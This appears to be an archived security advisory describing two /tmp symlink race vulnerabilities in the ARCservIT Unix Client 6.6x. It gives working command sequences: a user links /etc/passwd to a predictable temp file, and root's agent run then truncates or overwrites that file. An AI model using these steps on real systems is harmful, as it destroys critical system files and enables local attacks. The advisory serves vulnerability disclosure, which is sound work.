TUCoPS :: Unix :: General :: arc5.htm

ARCServeIT Client 6.6x - two or more /tmp races 
Vulnerability

    ARCserv

Affected

    ARCservIT Unix Client

Description

    Jonas  Eriksson  found  following.   Computer Associates ARCservIT
    Client version 6.6x has atleast two /tmp races, as following:

    Vulnerability #1
    ================
    This tmp-race only works if the asagent client never been executed
    before.  As user:

        je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp

    And root:

        root@boxname# /usr/CYEagent/asagent start
        CA Universal Agent ADV v1.39 started on openview SunOS 5.8
        Generic_108528-07 sun4u

        ARCserveIT Universal Agent started...

    Then,

        je@boxname~> ls -la /etc/passwd
        -r--r--r--   1 0        sys            0 May  9 11:59 /etc/passwd

    Vulnerability #2
    ================
    As user:

        je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp

    And root:

        root@boxname# /usr/CYEagent/asagent inet add

    Then,

        je@boxname~> cat /etc/passwd
        asagentd 6051/tcp # ARCserve agent
        asagentd 6051/udp # ARCserve agent

Solution

    Computer Associates has been informed.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH